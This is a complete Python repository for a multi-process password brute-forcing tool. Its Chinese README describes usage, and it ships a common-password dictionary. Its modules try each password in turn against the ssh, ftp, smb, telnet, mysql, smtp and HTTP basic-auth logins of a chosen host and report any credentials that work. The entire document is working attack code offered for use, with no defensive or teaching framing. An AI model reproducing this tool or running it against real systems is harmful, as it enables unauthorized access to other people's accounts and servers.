├── conf └── defaultPort.py ├── dict └── passwd ├── lib ├── ftpcrack.py ├── mysqlcrack.py ├── smbcrack.py ├── smtpcrack.py ├── http401crack.py ├── telnetcrack.py └── sshcrack.py ├── README.md └── crack.py /conf/defaultPort.py: -------------------------------------------------------------------------------- 1 | cracklist = { 2 | 'ssh': 22, 3 | 'ftp': 21, 4 | 'smb': [139, 445], 5 | 'telnet': 23, 6 | 'mysql': 3306, 7 | 'http401': 8080, 8 | 'smtp': 25, 9 | } -------------------------------------------------------------------------------- /dict/passwd: -------------------------------------------------------------------------------- 1 | admin 2 | Password 3 | 123456 4 | 123456789 5 | 111111 6 | 123123 7 | 12345678 8 | a123456 9 | 000000 10 | 5201314 11 | 11111111 12 | wodima123 13 | a123456789 14 | zxcvbnm 15 | 123456a 16 | 123321 17 | qq123456 18 | woaini1314 19 | 123456789a 20 | passport 21 | 1234567890 22 | 1314520 23 | abc123456 24 | 123123123 25 | 1234567 26 | 7758521 27 | 666666 28 | woaini -------------------------------------------------------------------------------- /lib/ftpcrack.py: -------------------------------------------------------------------------------- 1 | import time 2 | import ftplib 3 | 4 | class ftpcrack: 5 | def __init__(self,op,args): 6 | self.op=op 7 | self.args=args 8 | 9 | def run(self,inputq,outputq,username): 10 | while True: 11 | try: 12 | passwd=inputq.get(timeout=1) 13 | except: 14 | outputq.put(1) 15 | time.sleep(0.5) 16 | exit(1) 17 | 18 | try: 19 | f=ftplib.FTP() 20 | f.connect(self.op.host,port=self.op.port) 21 | f.login(username,passwd) 22 | outputq.put((username,passwd)) 23 | 24 | time.sleep(0.5) 25 | exit(1) 26 | except Exception as e: 27 | if self.op.verbose!=None: 28 | print("%s ----- (Username:%s Passwd:%s)" %(e,username,passwd)) 29 | else: 30 | print("Username:%s Passwd:%s" % (username, passwd)) 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /lib/mysqlcrack.py: -------------------------------------------------------------------------------- 1 | ''' 2 | module : pymysql 3 | 4 | 5 | ''' 6 | 7 | 8 | import time 9 | import pymysql 10 | import re 11 | 12 | class mysqlcrack: 13 | def __init__(self,op,args): 14 | self.op=op 15 | self.args=args 16 | 17 | 18 | def run(self,inputq,outputq,username): 19 | while True: 20 | try: 21 | passwd=inputq.get(timeout=1) 22 | except: 23 | outputq.put(1) 24 | time.sleep(0.5) 25 | exit(1) 26 | 27 | 28 | 29 | try: 30 | pymysql.connect(self.op.host, username,passwd, port=self.op.port) 31 | outputq.put((username,passwd)) 32 | time.sleep(0.5) 33 | exit(1) 34 | except Exception as e: 35 | if self.op.verbose!=None: 36 | print("%s ----- (Username:%s Passwd:%s)" %(e,username,passwd)) 37 | else: 38 | print("Username:%s Passwd: %s" %(username, passwd)) 39 | 40 | finally: 41 | pass -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 2 | 简介: 3 | 4 | python3多进程爆破程序,目前支持telnet/ftp/mysql/http401/smb/smtp/ssh 5 | 6 | 7 | # 8 | 目录结构: 9 | 10 | conf: 配置文件 11 | lib: 函数库 12 | dict: 爆破字典目录 13 | mcrack.py 入口程序 14 | 15 | # 16 | 使用简介: 17 | 18 | Usage: crack.py [options] 19 | 20 | Options: 21 | -h, --help show this help message and exit 22 | -H HOST, --host=HOST dest host 23 | -T TYPE, --type=TYPE such:ssh,file,ftp,telnet 24 | --process=PROCESS set num of process to run,default 4 25 | -P PASSWD, --passwd=PASSWD 26 | set login passwd dictory 27 | -U USERNAME, --username=USERNAME 28 | set login user 29 | -F FILE, --file=FILE set zip/rar file 30 | -p PORT, --port=PORT set service port 31 | -v, --verbose 32 | -u URL, --url=URL set url to crack 33 | 34 | Example: 35 | python crack.py -H 127.0.0.1 -Uroot -Ppasswd -T ftp 36 | python crack.py -H 127.0.0.1 -Uroot -Ppasswd -T ssh 37 | python crack.py =H 127.0.0.1 -U root -Ppasswd -T mysql 38 | 39 | -------------------------------------------------------------------------------- /lib/smbcrack.py: -------------------------------------------------------------------------------- 1 | ''' 2 | module : pysmb 3 | s=SMBConnection.SMBConnection(username,passwd,'','') 4 | s.connect(self.op.host) return True | false 5 | 6 | ''' 7 | 8 | 9 | import time 10 | from smb import SMBConnection 11 | 12 | class smbcrack: 13 | def __init__(self,op,args): 14 | self.op=op 15 | self.args=args 16 | 17 | def run(self,inputq,outputq,username): 18 | while True: 19 | try: 20 | passwd=inputq.get(timeout=1) 21 | except: 22 | outputq.put(1) 23 | time.sleep(0.5) 24 | exit(1) 25 | 26 | 27 | s=SMBConnection.SMBConnection(username,passwd,'','') 28 | if s.connect(self.op.host)==True: 29 | outputq.put((username,passwd)) 30 | time.sleep(0.5) 31 | exit(1) 32 | else: 33 | if self.op.verbose!=None: 34 | e='login incorrect' 35 | print("%s ----- (Username:%s Passwd:%s)" %(e,username,passwd)) 36 | else: 37 | print("Username:%s Passwd:%s:" % (username, passwd)) -------------------------------------------------------------------------------- /lib/smtpcrack.py: -------------------------------------------------------------------------------- 1 | ''' 2 | module : smtplib 3 | smtpObj = smtplib.SMTP() 4 | smtpObj.connect(mail_host, 25) # 25 为 SMTP 端口号 5 | smtpObj.login(mail_user,mail_pass) 6 | 7 | ''' 8 | 9 | 10 | import time 11 | import smtplib 12 | 13 | class smtpcrack: 14 | def __init__(self,op,args): 15 | self.op=op 16 | self.args=args 17 | 18 | def run(self,inputq,outputq,username): 19 | while True: 20 | try: 21 | passwd=inputq.get(timeout=1) 22 | except: 23 | outputq.put(1) 24 | time.sleep(0.5) 25 | exit(1) 26 | 27 | 28 | try: 29 | smtpObj = smtplib.SMTP() 30 | smtpObj.connect(self.op.host, self.op.port) # 25 为 SMTP 端口号 31 | smtpObj.login(username, passwd) 32 | outputq.put((username,passwd)) 33 | time.sleep(0.5) 34 | exit(1) 35 | except Exception as e: 36 | if self.op.verbose!=None: 37 | e='login incorrect' 38 | print("%s ----- (Username:%s Passwd:%s)" %(e,username,passwd)) 39 | else: 40 | print("Username:%s Passwd:%s:" % (username, passwd)) -------------------------------------------------------------------------------- /lib/http401crack.py: -------------------------------------------------------------------------------- 1 | ''' 2 | module : requests 3 | 4 | 5 | ''' 6 | 7 | 8 | import time 9 | import requests 10 | import base64 11 | 12 | 13 | class http401crack: 14 | def __init__(self,op,args): 15 | self.op=op 16 | self.args=args 17 | 18 | def run(self,inputq,outputq,username): 19 | while True: 20 | try: 21 | passwd=inputq.get(timeout=1) 22 | except: 23 | outputq.put(1) 24 | time.sleep(0.5) 25 | exit(1) 26 | 27 | 28 | 29 | data=base64.b64encode((username+':'+passwd).encode('utf-8')) 30 | headers={ 31 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", 32 | "Authorization": "Basic "+data.decode(), 33 | } 34 | 35 | rep=requests.get(self.op.url,headers=headers) 36 | if rep.status_code!=401: 37 | outputq.put((username,passwd)) 38 | time.sleep(0.5) 39 | exit(1) 40 | else: 41 | if self.op.verbose!=None: 42 | e='login incorrect' 43 | print("%s ----- (Username:%s Passwd:%s)" %(e,username,passwd)) 44 | else: 45 | print("Username:%s Passwd:%s:" % (username, passwd)) -------------------------------------------------------------------------------- /lib/telnetcrack.py: -------------------------------------------------------------------------------- 1 | ''' 2 | module : telnetlib 3 | 4 | 5 | ''' 6 | 7 | 8 | import time 9 | import telnetlib 10 | import re 11 | 12 | class telnetcrack: 13 | def __init__(self,op,args): 14 | self.op=op 15 | self.args=args 16 | 17 | 18 | def run(self,inputq,outputq,username): 19 | while True: 20 | try: 21 | passwd=inputq.get(timeout=1) 22 | except: 23 | outputq.put(1) 24 | time.sleep(0.5) 25 | exit(1) 26 | 27 | 28 | 29 | try: 30 | tn = telnetlib.Telnet(self.op.host,port=self.op.port,timeout=1) 31 | tn.read_until("login:".encode()) 32 | tn.write((username+'\r\n').encode()) 33 | tn.read_until("Password:".encode()) 34 | tn.write((passwd+"\r\n").encode()) 35 | tn.read_some() 36 | tn.read_some() 37 | tn.read_some() 38 | tn.read_some() 39 | outputq.put((username,passwd)) 40 | time.sleep(0.5) 41 | exit(1) 42 | except Exception as e: 43 | if self.op.verbose!=None: 44 | print("%s ----- (Username:%s Passwd:%s)" %(e,username,passwd)) 45 | else: 46 | print("Username:%s Passwd: %s" % (username, passwd)) 47 | 48 | finally: 49 | tn.close() -------------------------------------------------------------------------------- /lib/sshcrack.py: -------------------------------------------------------------------------------- 1 | ''' 2 | module : ssh 3 | ssh = paramiko.SSHClient() 4 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 5 | ssh.connect(hostname=hostname,port=port,username=username,password=password) 6 | 7 | 8 | 重新下载 paramiko 插件源码,解压后,编辑安装目录下的 transport.py 文件: 9 | 10 | vim build/lib/paramiko/transport.py 11 | 12 | 搜索 self.banner_timeout 关键词,并将其参数改大即可,比如改为 300s: 13 | 14 | self.banner_timeout = 300 15 | 16 | 最后,重装 paramiko 即可。 17 | 18 | 最大进程最好控制在8左右,否则回提示如上的报错 19 | ''' 20 | 21 | 22 | import time 23 | import paramiko 24 | 25 | class sshcrack: 26 | def __init__(self,op,args): 27 | self.op=op 28 | self.args=args 29 | 30 | def run(self,inputq,outputq,username): 31 | while True: 32 | try: 33 | passwd=inputq.get(timeout=1) 34 | except: 35 | outputq.put(1) 36 | time.sleep(0.5) 37 | exit(1) 38 | 39 | 40 | try: 41 | ssh = paramiko.SSHClient() 42 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 43 | ssh.connect(hostname=self.op.host, port=self.op.port, username=username, password=passwd) 44 | outputq.put((username,passwd)) 45 | time.sleep(0.5) 46 | exit(1) 47 | except Exception as e: 48 | if self.op.verbose!=None: 49 | print("%s ----- (Username:%s Passwd:%s)" %(e,username,passwd)) 50 | else: 51 | print("Username:%s Passwd:%s:" % (username, passwd)) 52 | 53 | 54 | finally: 55 | ssh.close() -------------------------------------------------------------------------------- /crack.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import optparse 3 | import os 4 | from multiprocessing import Process,Manager 5 | import telnetlib 6 | 7 | sys.path.append('lib') 8 | sys.path.append('conf') 9 | 10 | import defaultPort 11 | 12 | ROOTPATH=os.path.realpath('.') 13 | DICTPATH=ROOTPATH+'/dict/' 14 | 15 | 16 | class mcrack: 17 | cracklist=defaultPort.cracklist 18 | def __init__(self): 19 | parse = optparse.OptionParser() 20 | parse.add_option("-H", '--host', dest='host', help='dest host') 21 | parse.add_option('-T', '--type', dest='type', help='such:ssh,file,ftp,telnet') 22 | parse.add_option('--process',dest='process',help='set num of process to run,default 4',default='4') 23 | parse.add_option('-P','--passwd',dest='passwd',help='set login passwd dictory') 24 | parse.add_option('-U','--username',dest='username',help='set login user') 25 | parse.add_option('-F','--file',dest='file',help='set zip/rar file') 26 | parse.add_option('-p','--port',dest='port',default=None,help='set service port') 27 | parse.add_option('-v','--verbose',dest='verbose',action='count') 28 | parse.add_option('-u','--url',dest='url',help='set url to crack') 29 | 30 | example=optparse.OptionGroup( 31 | parse, 32 | 'Example', 33 | '''python crack.py -H 127.0.0.1 -Uroot -Ppasswd -T ftp \r\n 34 | python crack.py -H 127.0.0.1 -Uroot -Ppasswd -T ssh\r\n 35 | python crack.py -H 127.0.0.1 -Uroot -Ppasswd -T mstsc\r\n 36 | python crack.py =H 127.0.0.1 -U root -Ppasswd -T mysql\r\n 37 | ''', 38 | ) 39 | parse.add_option_group(example) 40 | 41 | self.op, self.args = parse.parse_args() 42 | 43 | 44 | if self.op.type == None or self.op.host == None or self.op.passwd==None or self.op.username==None: 45 | print("Usage: python crack.py -U root -H 127.0.0.1 -T smb -P passwd") 46 | elif self.op.type not in self.cracklist: 47 | print("Usage: python crack.py -H 127.0.0.1 -T [%s] ......." %"|".join(self.cracklist)) 48 | else: 49 | self.checkservice() 50 | 51 | def load(self): 52 | #1.判断对应的文件是否存在,存在就设置字典队列 53 | print("[-]Dictory Loading.......") 54 | try: 55 | self.inputQ=Manager().Queue() 56 | with open(DICTPATH+self.op.passwd,encoding='utf-8') as f: 57 | while True: 58 | line=f.readline().strip() 59 | if line!="": 60 | self.inputQ.put(line) 61 | else: 62 | break 63 | print("[+] %s -- the dictory is load ok!" %self.op.passwd) 64 | 65 | except Exception as e: 66 | print("[-] The Passwd File Is Not Exsit!") 67 | 68 | self.run() 69 | 70 | 71 | 72 | def checkPort(self,port): 73 | if self.op.type=='http401': 74 | #判断url是否有传递,没有传递就结束 75 | if self.op.url!=None: 76 | return (True,'http401') 77 | else: 78 | return (False,'401爆破:请输入URL地址') 79 | else: 80 | try: 81 | telnetlib.Telnet(self.op.host, port=port, timeout=1) 82 | return (True,'%s:%s is closed!" % (self.op.host, self.op.port)') 83 | except: 84 | return (False,"%s:%s is closed!" %(self.op.host,self.op.port)) 85 | 86 | 87 | def checkservice(self): 88 | '''对服务的端口检查,不通就直接结束''' 89 | 90 | if self.op.port==None: 91 | self.op.port=self.cracklist[self.op.type] 92 | 93 | 94 | if isinstance(self.op.port,list): 95 | for port in self.op.port: 96 | status,msg=self.checkPort(port) 97 | if not status: 98 | print(msg) 99 | exit(1) 100 | 101 | else: 102 | status,msg = self.checkPort(self.op.port) 103 | if not status: 104 | print(msg) 105 | exit(1) 106 | 107 | self.load() 108 | 109 | def run(self): 110 | 111 | #1.设置outputq 112 | self.outputQ = Manager().Queue() 113 | 114 | #1.调用爆破模块,直接设置进程数 115 | 116 | crackName=self.op.type+'crack' 117 | moduleName=__import__(crackName) 118 | t=getattr(moduleName,crackName)(self.op,self.args) 119 | 120 | 121 | plist=[] 122 | for i in range(0,int(self.op.process)): 123 | p=Process(target=t.run,args=(self.inputQ,self.outputQ,self.op.username)) 124 | plist.append(p) 125 | p.start() 126 | 127 | print("The CPU Concurrent Number is %s......" %self.op.process) 128 | 129 | flag=0 130 | while True: 131 | if flag==4: 132 | print("\n[-]not Found Passwd!") 133 | break 134 | data=self.outputQ.get() 135 | if data==1: 136 | flag+=1 137 | else: 138 | print("\n[+]Found Passwd: %s/%s" %(data[0],data[1])) 139 | break 140 | 141 | 142 | print() 143 | 144 | for p in plist: 145 | p.terminate() 146 | 147 | 148 | 149 | 150 | if __name__=="__main__": 151 | crack=mcrack() 152 | --------------------------------------------------------------------------------